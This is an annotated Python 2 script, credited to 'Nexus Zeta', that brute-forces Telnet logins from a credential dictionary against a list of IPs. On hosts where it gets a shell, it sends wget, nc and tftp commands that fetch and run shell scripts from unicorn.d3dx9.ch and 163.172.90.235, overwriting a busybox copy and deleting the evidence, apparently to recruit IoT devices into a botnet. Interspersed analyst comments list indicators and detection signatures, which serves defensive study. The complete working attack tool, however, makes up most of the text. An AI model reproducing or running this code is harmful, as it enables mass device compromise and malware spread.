- #!/usr/bin/env python
- from termcolor import colored
- from Queue import *
- from sys import stdout
- import threading, sys, time, random, socket, re, os, logging
# Analyst note: the paste lost its indentation and every code line carries a "- "
# list prefix, so the nesting described in these notes is inferred from syntax.
# The code is Python 2 (print statements, the Queue module, xrange).
# Arguments as read below: argv[1] = file of target IPs, argv[2] = credential
# dictionary in user:pass form, argv[3] = number of worker threads,
# argv[4] = batch size (worker() dequeues argv[4] + 1 IPs per round).
- if len(sys.argv) < 5:
- print "Example: python %s targets.txt dictionary.txt <threads(1-100)> <ips per scan(100-1000)>" % (str(sys.argv[0]))
- print "Dictionary should be in user:pass format"
- sys.exit(1)
# Banner string; useful as an attribution/clustering marker when comparing samples.
- print "\x1b[1;32m***********************\x1b[1;35m"
- print "\x1b[1;32m* Coded by Nexus Zeta *\x1b[1;35m"
- print "\x1b[1;32m***********************\x1b[1;35m"
- #ip=sys.argv[1]
- filename=sys.argv[2]
- threads = int(sys.argv[3])
- h0h0 = int(sys.argv[4])
# The whole target list is read into memory; each entry keeps its trailing newline.
- ips = open(sys.argv[1], "r").readlines()
# Shared work queue of target IPs and a counter used only for progress output.
- queue = Queue()
- qcount = 0
# Post-login command strings. attempt() sends wget, echo, tftp1 and tftp2, in that
# order, to any host where it believes it has a shell prompt.
# Each string changes into a directory and fetches a shell script by one transport:
# wget over HTTP, a hand-written HTTP request piped through nc, or tftp. The wget and
# tftp variants write the download over a local copy of /bin/busybox and run that
# copy; the echo variant runs armv4l.sh from /var/. All of them delete the files
# afterwards, so on-disk traces may be short-lived.
# Indicators visible in these strings: host unicorn.d3dx9.ch, address 163.172.90.235
# (HTTP on port 80, and TFTP), fetched names bins.sh and armv4l.sh, on-disk name
# dvrHelper. The command strings are fixed, so they can be matched verbatim in
# Telnet honeypot logs or IDS content rules; the host and address can be searched
# for in DNS, proxy and flow logs.
- #cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; wget http://unicorn.d3dx9.ch/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper
- wget = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; wget http://unicorn.d3dx9.ch/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
- echo = "cd /var/; rm -rf busybox filename; rm -rf busybox armv4l.sh; echo -ne 'GET /armv4l.sh HTTP/1.0\r\nHost: 163.172.90.235\r\n\r\n' | nc 163.172.90.235 80 > armv4l.sh; chmod +x *; sed -i 1,9d armv4l.sh; cp /bin/busybox ./; busybox cat armv4l.sh > armv4l.sh; chmod +x armv4l.sh; ./armv4l.sh; rm -rf busybox armv4l.sh;"
- tftp1 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp 163.172.90.235 -c get bins.sh; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
- tftp2 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp -r bins.sh -g 163.172.90.235; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
# The two variants below (ftpget, curl) are commented out and are never sent.
- #ftpget = "cd /var/; rm -rf armv4l; ftpget -v -u anonymous -p anonymous -P 21 163.172.90.235 armv4l armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
- #curl = "cd /var/; rm -rf armv4l; curl -O http://unicorn.d3dx9.ch/bin/armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
# Copies every line of the targets file into the shared queue, rewriting a single
# progress line ("\r[n] Added to queue") on stdout as it goes. Entries are queued
# with their trailing newline; worker() strips it before use.
- for ip in ips:
- qcount += 1
- stdout.write("\r[%d] Added to queue" % qcount)
- stdout.flush()
- queue.put(ip)
- print "\n"
# readUntil(tn, string, timeout=20): accumulate data from socket `tn` in chunks of
# up to 1024 bytes until `string` appears in the buffer, then return the buffer.
# The loop is bounded by `timeout` seconds of wall-clock time, checked between reads.
# With the raise below commented out, no value is returned when the deadline passes,
# so the caller receives None in that case.
- def readUntil(tn, string, timeout=20):
- buf = ''
- start_time = time.time()
- while time.time() - start_time < timeout:
- buf += tn.recv(1024)
- time.sleep(0.01)
- if string in buf: return buf
- #raise Exception('TIMEOUT!')
# worker(): batch dispatcher run by each worker thread. Per round it checks whether
# the queue is empty, dequeues h0h0 + 1 target lines (marking each as done on the
# queue), then starts one ipthread() thread per dequeued IP with short sleeps in
# between. Both except clauses are bare, so every error is swallowed; the inner one
# only prints "WORKER ERROR".
# NOTE(review): indentation is lost in this paste, so which sleeps sit inside which
# loop cannot be confirmed from the text.
- def worker():
- try:
- while True:
- try:
- if queue.empty() == True:
- sys.exit(1)
- iplist = []
- h0h0h0 = h0h0 + 1
- #print "\033[33mGathering IPs\033[37m"%(ip.rstrip("\n"))
- for x in xrange(h0h0h0):
- ip = queue.get()
- iplist.append(ip)
- #print "\033[33mIP Address Obtained \033[32m%s\033[37m"%(ip.rstrip("\n"))
- queue.task_done()
- time.sleep(1.5)
- for ip in iplist:
# The newline kept from the targets file is stripped here; "null" is a placeholder
# second argument that ipthread() does not use.
- t = threading.Thread(target=ipthread, args=(ip.rstrip(),"null"))
- t.start()
- time.sleep(0.009)
- time.sleep(1)
- #print "\033[32mStarting Telnet Threads\033[37m"
- except:
- print "\033[31mWORKER ERROR\033[37m" #will fuk up if more threads/workers then ips in list
- pass
- except:
- pass
# attempt(IP, UserName, Password): one Telnet login try against IP on TCP port 23,
# followed by payload delivery if a shell prompt seems to appear. Stages, each in
# its own try/except that closes the socket on any Exception:
#   1. connect (5 s socket timeout), wait for ":" and send the username if the
#      banner contains "ogin" or "sername";
#   2. wait for ":" again and, if "assword" is present, send the password followed
#      by the bare commands wget, tftp and ifconfig;
#   3. read up to 1024 bytes and treat any of "#", "$", "@", ">" as a shell prompt;
#      on a match send the four command strings defined at module level, print the
#      hit, and append it to session.txt.
# Detection notes: the fixed sequence "wget", "tftp", "ifconfig" sent immediately
# after the password, and the command strings that follow, are stable content
# signatures for Telnet honeypots and network sensors. The exposure being used is
# a reachable Telnet service that accepts a credential pair from the dictionary.
- def attempt(IP,UserName,Password):
- try:
- ip=IP
- username=UserName
- password=Password
- tn = socket.socket()
- tn.settimeout(5)
- tn.connect((IP, 23))
- #except Exception:
- #print "[%s] Timeout"%(count)
- #try:
- time.sleep(0.01)
- hoho = ''
- hoho += readUntil(tn, ":")
# Substring tests without the first letter match either capitalisation of the prompt.
- if "ogin" in hoho or "sername" in hoho:
- tn.send(UserName + "\n")
- except Exception:
- tn.close()
- try:
- hoho = ''
- hoho += readUntil(tn, ":")
- if "assword" in hoho:
- tn.send(Password + "\n")
- tn.send("wget\n")
- tn.send("tftp\n")
- tn.send("ifconfig\n")
- time.sleep(3)
- except Exception:
- tn.close()
- try:
- mp = ''
- mp += tn.recv(1024)
# Loose success test: any one of these characters in the first read counts as a shell.
- if "#" in mp or "$" in mp or "@" in mp or ">" in mp:
- #if "addr" in mp or "Usage" in mp or "wget:" in mp or "tftp:" in mp or "ifconfig:" in mp or "$" in mp or "#" in mp:
- tn.send(wget + "\n")
- tn.send(echo + "\n")
- tn.send(tftp1 + "\n")
- tn.send(tftp2 + "\n")
- #tn.send(ftpget + "\n")
- #tn.send(curl + "\n")
- print '\x1b[1;32mFound \x1b[1;31m '+IP+':23 \x1b[1;35m'+UserName+':\x1b[1;36m'+Password+'\x1b[1;33m'
# Hits are appended as "IP:23 user:pass" to session.txt in the working directory;
# that file is a forensic artifact on the machine running this script.
- f = open('session.txt', 'a')
- f.write("%s:23 %s:%s\n" % (IP, UserName, Password))
- f.close()
- time.sleep(15)
- tn.close()
- except Exception:
- tn.close()
# ipthread(ip, null): for one target IP, re-read the credential dictionary and start
# one attempt() thread per line, 0.3 s apart. Each line is split on ":" into exactly
# two fields (username, password). The `null` parameter is not used in the body.
- def ipthread(ip,null):
- fd = open(filename, "r")
- for line in fd.readlines():
- username, password = line.strip().split(":")
- t = threading.Thread(target=attempt, args=(ip,username,password))
- t.start()
- time.sleep(0.3)
- fd.close()
# Entry point: start `threads` daemon worker() threads, then block until every
# queued item has been marked done via queue.task_done(), and print "Finished!".
- for g in xrange(threads):
- t = threading.Thread(target=worker)
- t.setDaemon(True)
- t.start()
- time.sleep(0.001)
- queue.join()
- print "Finished!"